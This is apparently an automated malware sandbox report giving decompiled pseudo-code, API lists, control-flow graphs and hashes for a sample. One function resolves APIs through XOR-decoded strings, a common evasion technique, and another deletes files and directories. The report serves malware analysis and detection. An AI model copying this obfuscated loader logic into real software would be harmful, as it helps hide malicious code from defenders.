						asm("movaps xmm0, [0x8a90d0]");
						_t44 =  *0x8b4cac; // 0x8000005e
						asm("movups [ebp-0x1c], xmm0");
						_v16 = 0x2e5d434b;
						if(_t44 >  *((intOrPtr*)(_t107 + 4))) {
							E0086DB91(_t44, 0x8b4cac);
							_t126 =  *0x8b4cac - 0xffffffff;
							_pop(_t102);
							if( *0x8b4cac == 0xffffffff) {
								L0082CFDE( &_v32);
								L0086DFE8(_t102, _t126, 0x8962a3);
								L0086DB47(0x8b4cac);
							}
							_t89 =  *0x8b4858; // 0x6db20000
						}
						if( *0x8b607f == _t88) {
							L15:
							_t45 = GetProcAddress(_t89, 0x8b606c);
							asm("movaps xmm0, [0x8a8fc0]");
							 *0x8b4870 = _t45;
							_t46 =  *0x8b5548; // 0x8000005f
							asm("movups [ebp-0x1c], xmm0");
							_v16 = 0x5d5a425b;
							_v12 = 0x2e;
							if(_t46 >  *((intOrPtr*)(_t107 + 4))) {
								E0086DB91(_t46, 0x8b5548);
								_t130 =  *0x8b5548 - 0xffffffff;
								if( *0x8b5548 == 0xffffffff) {
									E0082D54D(0x8b4f88,  &_v32);
									L0086DFE8(0x8b4f88, _t130, 0x896293);
									 *_t118 = 0x8b5548;
									L0086DB47();
								}
							}
							_t131 =  *0x8b4f9c - _t88; // 0x0
							if(_t131 == 0) {
								L21:
								 *0x8b481c = GetProcAddress( *0x8b4858, 0x8b4f88);
								_t48 =  *0x8b4c90; // 0x80000060
								_v24 = 0x425b4f78;
								_v20 = 0x4b5c685a;
								_v16 = 0x2e4b;
								if(_t48 >  *((intOrPtr*)(_t107 + 4))) {
									E0086DB91(_t48, 0x8b4c90);
									_t134 =  *0x8b4c90 - 0xffffffff;
									_pop(_t97);
									if( *0x8b4c90 == 0xffffffff) {
										asm("movsd");
										asm("movsd");
										asm("movsw");
										L0086DFE8(_t97, _t134, 0x896285);
										 *_t118 = 0x8b4c90;
										L0086DB47();
										_t107 = _v8;
									}
								}
								_t135 =  *0x8b5189 - _t88; // 0x0
								if(_t135 == 0) {
									L27:
									 *0x8b4830 = GetProcAddress( *0x8b4858, 0x8b5180);
									_t52 = GetProcAddress( *0x8b4858, E0082D2AE(E0082A8B7()));
									asm("movaps xmm0, [0x8a8cc0]");
									 *0x8b4824 = _t52;
									_t53 =  *0x8b60d0;
									asm("movups [ebp-0x18], xmm0");
									if( *0x8b60d0 >  *((intOrPtr*)(_t107 + 4))) {
										E0086DB91(_t53, 0x8b60d0);
										_t138 =  *0x8b60d0 - 0xffffffff;
										if( *0x8b60d0 == 0xffffffff) {
											E0082D327(0x8b4fa4,  &_v28);
											L0086DFE8(0x8b4fa4, _t138, 0x896267);
											 *_t118 = 0x8b60d0;
											L0086DB47();
										}
									}
									 *0x8b4894 = GetProcAddress( *0x8b4858, E0082D30D(0x8b4fa4));
									_t56 =  *0x8b4f34; // 0x80000063
									_v24 = 0x425b4f78;
									_v20 = 0x5a4b695a;
									_v16 = 0x434b5a67;
									_v12 = 0x2e;
									if(_t56 >  *((intOrPtr*)(_t107 + 4))) {
										E0086DB91(_t56, 0x8b4f34);
										_t140 =  *0x8b4f34 - 0xffffffff;
										_pop(_t92);
										if( *0x8b4f34 == 0xffffffff) {
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsb");
											L0086DFE8(_t92, _t140, 0x896259);
											 *_t118 = 0x8b4f34;
											L0086DB47();
										}
									}
									if( *0x8b6094 == _t88) {
										L35:
										_t57 = GetProcAddress( *0x8b4858, 0x8b6088);
										 *0x8b4850 = _t57;
										if( *0x8b4870 == 0 ||  *0x8b481c == 0 ||  *0x8b4830 == 0 ||  *0x8b4824 == 0 ||  *0x8b4894 == 0 || _t57 == 0) {
											FreeLibrary( *0x8b4858);
											goto L43;
										} else {
											 *0x8b488b = 1;
											return 1;
										}
									} else {
										do {
											 *(_t88 + 0x8b6088) =  *(_t88 + 0x8b6088) ^ 0x0000002e;
											_t88 = _t88 + 1;
										} while (_t88 < 0xd);
										goto L35;
									}
								} else {
									_t68 = _t88;
									do {
										 *(_t68 + 0x8b5180) =  *(_t68 + 0x8b5180) ^ 0x0000002e;
										_t68 = _t68 + 1;
									} while (_t68 < 0xa);
									goto L27;
								}
							} else {
								_t72 = _t88;
								do {
									 *(_t72 + 0x8b4f88) =  *(_t72 + 0x8b4f88) ^ 0x0000002e;
									_t72 = _t72 + 1;
								} while (_t72 < 0x15);
								goto L21;
							}
						} else {
							_t78 = _t88;
							do {
								 *(_t78 + 0x8b606c) =  *(_t78 + 0x8b606c) ^ 0x0000002e;
								_t78 = _t78 + 1;
							} while (_t78 < 0x14);
							goto L15;
						}
					}
					_t84 = _t88;
					do {
						 *(_t84 + 0x8b5c78) =  *(_t84 + 0x8b5c78) ^ 0x0000002e;
						_t84 = _t84 + 1;
					} while (_t84 < 0xd);
					goto L7;
				}
			}


































                                    0x0082a528
                                    0x0082a8b0
                                    0x0082a8b0
                                    0x00000000
                                    0x0082a52e
                                    0x0082a534
                                    0x0082a536
                                    0x0082a53d
                                    0x0082a544
                                    0x0082a54b
                                    0x0082a54d
                                    0x0082a552
                                    0x0082a556
                                    0x0082a55f
                                    0x0082a566
                                    0x0082a56b
                                    0x0082a572
                                    0x0082a573
                                    0x0082a582
                                    0x0082a583
                                    0x0082a584
                                    0x0082a585
                                    0x0082a586
                                    0x0082a58b
                                    0x0082a592
                                    0x0082a597
                                    0x0082a59a
                                    0x0082a573
                                    0x0082a59b
                                    0x0082a5a1
                                    0x0082a5b2
                                    0x0082a5b7
                                    0x0082a5bd
                                    0x0082a5bf
                                    0x0082a5c7
                                    0x00000000
                                    0x00000000
                                    0x0082a5cd
                                    0x0082a5d4
                                    0x0082a5d9
                                    0x0082a5dd
                                    0x0082a5ea
                                    0x0082a5f2
                                    0x0082a5f7
                                    0x0082a5fe
                                    0x0082a5ff
                                    0x0082a605
                                    0x0082a60f
                                    0x0082a615
                                    0x0082a61b
                                    0x0082a61c
                                    0x0082a61c
                                    0x0082a628
                                    0x0082a639
                                    0x0082a645
                                    0x0082a647
                                    0x0082a64e
                                    0x0082a653
                                    0x0082a658
                                    0x0082a65c
                                    0x0082a663
                                    0x0082a66d
                                    0x0082a674
                                    0x0082a679
                                    0x0082a681
                                    0x0082a68c
                                    0x0082a696
                                    0x0082a69b
                                    0x0082a6a2
                                    0x0082a6a7
                                    0x0082a681
                                    0x0082a6a8
                                    0x0082a6ae
                                    0x0082a6bf
                                    0x0082a6cc
                                    0x0082a6d1
                                    0x0082a6d6
                                    0x0082a6dd
                                    0x0082a6e4
                                    0x0082a6f0
                                    0x0082a6f7
                                    0x0082a6fc
                                    0x0082a703
                                    0x0082a704
                                    0x0082a713
                                    0x0082a714
                                    0x0082a715
                                    0x0082a717
                                    0x0082a71c
                                    0x0082a723
                                    0x0082a72e
                                    0x0082a731
                                    0x0082a704
                                    0x0082a732
                                    0x0082a738
                                    0x0082a749
                                    0x0082a756
                                    0x0082a76e
                                    0x0082a770
                                    0x0082a777
                                    0x0082a77c
                                    0x0082a781
                                    0x0082a78b
                                    0x0082a792
                                    0x0082a797
                                    0x0082a79f
                                    0x0082a7aa
                                    0x0082a7b4
                                    0x0082a7b9
                                    0x0082a7c0
                                    0x0082a7c5
                                    0x0082a79f
                                    0x0082a7d9
                                    0x0082a7de
                                    0x0082a7e3
                                    0x0082a7ea
                                    0x0082a7f1
                                    0x0082a7f8
                                    0x0082a802
                                    0x0082a809
                                    0x0082a80e
                                    0x0082a815
                                    0x0082a816
                                    0x0082a825
                                    0x0082a826
                                    0x0082a827
                                    0x0082a828
                                    0x0082a829
                                    0x0082a82e
                                    0x0082a835
                                    0x0082a840
                                    0x0082a816
                                    0x0082a847
                                    0x0082a856
                                    0x0082a861
                                    0x0082a86a
                                    0x0082a86f
                                    0x0082a8aa
                                    0x00000000
                                    0x0082a899
                                    0x0082a899
                                    0x00000000
                                    0x0082a8a0
                                    0x0082a849
                                    0x0082a849
                                    0x0082a849
                                    0x0082a850
                                    0x0082a851
                                    0x00000000
                                    0x0082a849
                                    0x0082a73a
                                    0x0082a73a
                                    0x0082a73c
                                    0x0082a73c
                                    0x0082a743
                                    0x0082a744
                                    0x00000000
                                    0x0082a73c
                                    0x0082a6b0
                                    0x0082a6b0
                                    0x0082a6b2
                                    0x0082a6b2
                                    0x0082a6b9
                                    0x0082a6ba
                                    0x00000000
                                    0x0082a6b2
                                    0x0082a62a
                                    0x0082a62a
                                    0x0082a62c
                                    0x0082a62c
                                    0x0082a633
                                    0x0082a634
                                    0x00000000
                                    0x0082a62c
                                    0x0082a628
                                    0x0082a5a3
                                    0x0082a5a5
                                    0x0082a5a5
                                    0x0082a5ac
                                    0x0082a5ad
                                    0x00000000
                                    0x0082a5a5

                                    APIs
                                    • LoadLibraryA.KERNELBASE(008B5C78), ref: 0082A5B7
                                    • GetProcAddress.KERNEL32(00000000,008B606C), ref: 0082A645
                                    • GetProcAddress.KERNEL32(008B5180), ref: 0082A754
                                    • GetProcAddress.KERNEL32(00000000), ref: 0082A76E
                                    • GetProcAddress.KERNEL32(00000000), ref: 0082A7D7
                                    • GetProcAddress.KERNEL32(008B4F88), ref: 0082A6CA
                                      • Part of subcall function 0086DB91: EnterCriticalSection.KERNEL32(008B3CAC,?,74714EE0,?,0081416B,008B54D0,00000000), ref: 0086DB9C
                                      • Part of subcall function 0086DB91: LeaveCriticalSection.KERNEL32(008B3CAC,?,0081416B,008B54D0,00000000), ref: 0086DBD9
                                    • GetProcAddress.KERNEL32(008B6088), ref: 0082A861
                                      • Part of subcall function 0086DB47: EnterCriticalSection.KERNEL32(008B3CAC,69494B7C,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB51
                                      • Part of subcall function 0086DB47: LeaveCriticalSection.KERNEL32(008B3CAC,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB84
                                      • Part of subcall function 0086DB47: RtlWakeAllConditionVariable.NTDLL ref: 0086DBFB
                                    • FreeLibrary.KERNEL32 ref: 0082A8AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$CriticalSection$EnterLeaveLibrary$ConditionFreeLoadVariableWake
                                    • String ID: .$XO[BZMBG$gZKC
                                    • API String ID: 2402374661-770554371
                                    • Opcode ID: a5b938d25d1ccd1d06f6c33edebcbc361f4688fa514cdabe8be041e61eb5f727
                                    • Instruction ID: ac9d10ab09df0954ca1445312abd4cd6c1bfb8bdca29e3254101f0c8df3802c7
                                    • Opcode Fuzzy Hash: a5b938d25d1ccd1d06f6c33edebcbc361f4688fa514cdabe8be041e61eb5f727
                                    • Instruction Fuzzy Hash: AF91E1709047959FCB15EFA8F8466AD7BA1FF05310F161229E460E73A3DB7858C2CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00856531 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2467 856531-856577 call 855c8d 2470 856579-856584 RemoveDirectoryW 2467->2470 2471 8565da-8565f4 call 8564fd 2467->2471 2473 856594-85659f GetLastError 2470->2473 2474 856586-85658f 2470->2474 2479 8565f6-85660c call 811d6f 2471->2479 2480 85660e-85662c SetFileInformationByHandle 2471->2480 2477 8565b4-8565d5 GetLastError call 811d6f 2473->2477 2478 8565a1-8565ac DeleteFileW 2473->2478 2476 85668a-856699 2474->2476 2477->2476 2478->2474 2481 8565ae GetLastError 2478->2481 2487 85667b-856681 call 855d9c 2479->2487 2488 856636-856641 GetLastError 2480->2488 2489 85662e-856634 2480->2489 2481->2477 2493 856686-856688 2487->2493 2491 856653-85666e 2488->2491 2492 856643-856646 2488->2492 2489->2487 2491->2489 2499 856670-856673 GetLastError 2491->2499 2492->2491 2494 856648-85664b 2492->2494 2493->2476 2494->2491 2496 85664d-856651 2494->2496 2497 856679 2496->2497 2497->2487 2499->2497
                                    C-Code - Quality: 54%
                                    			E00856531(WCHAR* _a4) {
				char _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v44;
				void* __ebp;
				signed int _t24;
				void* _t29;
				void* _t32;
				char _t36;
				intOrPtr _t38;
				void* _t51;
				void* _t54;
				void* _t56;
				intOrPtr* _t71;
				signed int _t75;

				_push(0xffffffff);
				_push(0x8943d4);
				_push( *[fs:0x0]);
				_t24 =  *0x8b2014; // 0x61232540
				_push(_t24 ^ _t75);
				 *[fs:0x0] =  &_v16;
				_t71 = L00855C8D(0x8b3958, L"kernel32.dll", "SetFileInformationByHandle", 0x855d5a);
				if(_t71 != 0x855d5a) {
					_t29 = E008564FD( &_v24, _a4, 0x10000, 0x2200000); // executed
					_t47 = _t29;
					if(_t29 == 0) {
						_v32 = 3;
						_t49 = _t71;
						 *0x89728c(_v24, 0x15,  &_v32, 4); // executed
						_t32 =  *_t71(); // executed
						if(_t32 == 0) {
							_t51 = GetLastError() - 1;
							if(_t51 == 0) {
								L15:
								_v17 = 1;
								_t49 = _t71;
								 *0x89728c(_v24, 4,  &_v17, 1);
								_t36 =  *_t71();
								if(_t36 != 0) {
									goto L10;
								} else {
									_v44 = _t36;
									GetLastError();
									goto L17;
								}
							} else {
								_t54 = _t51 - 0x31;
								if(_t54 == 0) {
									goto L15;
								} else {
									_t49 = _t54 == 0x25;
									if(_t54 == 0x25) {
										goto L15;
									} else {
										_v44 = 0;
										L17:
									}
								}
							}
						} else {
							L10:
							_v44 = 1;
						}
					} else {
						_v44 = 0;
						L00811D6F(_t47);
						_pop(_t49);
						asm("sbb edi, edi");
					}
					E00855D9C(_t49, _t56, _v24); // executed
					_t38 = _v44;
				} else {
					if(RemoveDirectoryW(_a4) == 0) {
						if(GetLastError() != 0x10b) {
							L6:
							_v28 = 0;
							L00811D6F(GetLastError());
							_t38 = _v28;
							asm("sbb edx, edx");
						} else {
							if(DeleteFileW(_a4) != 0) {
								goto L2;
							} else {
								GetLastError();
								goto L6;
							}
						}
					} else {
						L2:
						_v36 = 1;
						_t38 = _v36;
					}
				}
				 *[fs:0x0] = _v16;
				return _t38;
			}





















                                    0x00856534
                                    0x00856536
                                    0x00856541
                                    0x00856548
                                    0x0085654f
                                    0x00856553
                                    0x00856573
                                    0x00856577
                                    0x008565eb
                                    0x008565f0
                                    0x008565f4
                                    0x00856613
                                    0x00856620
                                    0x00856622
                                    0x00856628
                                    0x0085662c
                                    0x0085663e
                                    0x00856641
                                    0x00856653
                                    0x00856658
                                    0x00856662
                                    0x00856664
                                    0x0085666a
                                    0x0085666e
                                    0x00000000
                                    0x00856670
                                    0x00856670
                                    0x00856673
                                    0x00000000
                                    0x00856673
                                    0x00856643
                                    0x00856643
                                    0x00856646
                                    0x00000000
                                    0x00856648
                                    0x00856648
                                    0x0085664b
                                    0x00000000
                                    0x0085664d
                                    0x0085664d
                                    0x00856679
                                    0x00856679
                                    0x0085664b
                                    0x00856646
                                    0x0085662e
                                    0x0085662e
                                    0x0085662e
                                    0x00856632
                                    0x008565f6
                                    0x008565f7
                                    0x008565fb
                                    0x00856605
                                    0x00856606
                                    0x0085660a
                                    0x00856681
                                    0x00856686
                                    0x00856579
                                    0x00856584
                                    0x0085659f
                                    0x008565b4
                                    0x008565b4
                                    0x008565c1
                                    0x008565c9
                                    0x008565cf
                                    0x008565a1
                                    0x008565ac
                                    0x00000000
                                    0x008565ae
                                    0x008565ae
                                    0x00000000
                                    0x008565ae
                                    0x008565ac
                                    0x00856586
                                    0x00856586
                                    0x00856586
                                    0x0085658c
                                    0x0085658c
                                    0x00856584
                                    0x0085668d
                                    0x00856699

                                    APIs
                                      • Part of subcall function 00855C8D: GetModuleHandleW.KERNEL32(00000000,00000000,?,00856317,008B3954,kernel32.dll,GetFileInformationByHandleEx,00855D5A,00000003,?,00000080,0089439A), ref: 00855C9D
                                      • Part of subcall function 00855C8D: GetProcAddress.KERNEL32(00000000,0089439A), ref: 00855CAB
                                    • RemoveDirectoryW.KERNEL32(00000000,008B3958,kernel32.dll,SetFileInformationByHandle,00855D5A,61232540,?,?,?,00000000), ref: 0085657C
                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00856594
                                    • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 008565A4
                                    • GetLastError.KERNEL32(?,?,00000000), ref: 008565AE
                                    • GetLastError.KERNEL32(?,?,00000000), ref: 008565B8
                                    • ___std_fs_open_handle@16.LIBCPMT ref: 008565EB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$AddressDeleteDirectoryFileHandleModuleProcRemove___std_fs_open_handle@16
                                    • String ID: SetFileInformationByHandle$kernel32.dll
                                    • API String ID: 1377414829-82236170
                                    • Opcode ID: af029fa68bc31ef93b125cdd9e2f64f0519409162ca349033d15a749335462d0
                                    • Instruction ID: 6a82f3e8c0e22f4df23ea9641033ffdbcf051eb48402d03bc67191beeb9247b8
                                    • Opcode Fuzzy Hash: af029fa68bc31ef93b125cdd9e2f64f0519409162ca349033d15a749335462d0
                                    • Instruction Fuzzy Hash: 85412631A08508ABDF11ABB9CC08BAEBFF5FB54756F584026FD01E3290EB748908C761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008844F6 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2500 8844f6-884506 2501 884508-88451b call 873c91 call 873ca4 2500->2501 2502 884520-884522 2500->2502 2518 88489f 2501->2518 2504 884528-88452e 2502->2504 2505 884887-884894 call 873c91 call 873ca4 2502->2505 2504->2505 2508 884534-88455a 2504->2508 2523 88489a call 873529 2505->2523 2508->2505 2511 884560-884569 2508->2511 2514 88456b-88457e call 873c91 call 873ca4 2511->2514 2515 884583-884585 2511->2515 2514->2523 2516 88458b-88458e 2515->2516 2517 884883-884885 2515->2517 2516->2517 2521 884594-884598 2516->2521 2522 8848a2-8848a5 2517->2522 2518->2522 2521->2514 2525 88459a-8845b1 2521->2525 2523->2518 2528 884602-884608 2525->2528 2529 8845b3-8845b6 2525->2529 2531 88460a-884614 2528->2531 2532 8845ce-8845e5 call 873c91 call 873ca4 call 873529 2528->2532 2533 8845b8-8845c1 2529->2533 2534 8845c6-8845cc 2529->2534 2535 88461b-884639 call 88255c call 880123 * 2 2531->2535 2536 884616-884618 2531->2536 2567 8847ba 2532->2567 2537 884686-884696 2533->2537 2534->2532 2538 8845ea-8845fd 2534->2538 2571 88463b-884651 call 873ca4 call 873c91 2535->2571 2572 884656-88467f call 88cafc 2535->2572 2536->2535 2540 88475b-884764 call 88c903 2537->2540 2541 88469c-8846a8 2537->2541 2538->2537 2555 884766-884778 2540->2555 2556 8847d7 2540->2556 2541->2540 2544 8846ae-8846b0 2541->2544 2544->2540 2548 8846b6-8846da 2544->2548 2548->2540 2552 8846dc-8846f2 2548->2552 2552->2540 2557 8846f4-8846f6 2552->2557 2555->2556 2561 88477a-884789 GetConsoleMode 2555->2561 2559 8847db-8847f3 ReadFile 2556->2559 2557->2540 2563 8846f8-88471e 2557->2563 2565 88484f-88485a GetLastError 2559->2565 2566 8847f5-8847fb 2559->2566 2561->2556 2562 88478b-88478f 2561->2562 2562->2559 2568 884791-8847ab ReadConsoleW 2562->2568 2563->2540 2570 884720-884736 2563->2570 2573 88485c-88486e call 873ca4 call 873c91 2565->2573 2574 884873-884876 2565->2574 2566->2565 2575 8847fd 2566->2575 2569 8847bd-8847c7 call 880123 2567->2569 2578 8847cc-8847d5 2568->2578 2579 8847ad GetLastError 2568->2579 2569->2522 2570->2540 2581 884738-88473a 2570->2581 2571->2567 2572->2537 2573->2567 2576 88487c-88487e 2574->2576 2577 8847b3-8847b9 __dosmaperr 2574->2577 2584 884800-884812 2575->2584 2576->2569 2577->2567 2578->2584 2579->2577 2581->2540 2588 88473c-884756 2581->2588 2584->2569 2591 884814-884818 2584->2591 2588->2540 2594 88481a-88482a call 884210 2591->2594 2595 884831-88483c 2591->2595 2604 88482d-88482f 2594->2604 2597 884848-88484d call 88403f 2595->2597 2598 88483e call 884367 2595->2598 2605 884843-884846 2597->2605 2598->2605 2604->2569 2605->2604
                                    C-Code - Quality: 82%
                                    			E008844F6(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = L00873C91(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(L00873CA4( *_t137))) = 9;
						L60:
						_t139 = E00873529();
						goto L61;
					}
					__eflags = _t198 -  *0x8b46f0; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x8b44f0 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(L00873C91(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(L00873CA4(__eflags))) = 0x16;
								E00873529();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E0088255C(_t212, _t154);
								E00880123(0);
								E00880123(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E0088CAFC(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x8b44f0 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x8b44f0 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x8b44f0 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x8b44f0 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x8b44f0 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x8b44f0 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x8b44f0 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E0088C903(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0); // executed
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													L00873C6E(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(L00873CA4(__eflags))) = 9;
											 *(L00873C91(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x8b44f0 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E0088403F();
												} else {
													_t170 = E00884367();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E00884210(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x8b44f0 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t108 =  &_v28; // 0xa
									_t174 = GetConsoleMode( *_t108,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(L00873CA4(__eflags))) = 0xc;
									 *(L00873C91(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E00880123(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x8b44f0 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
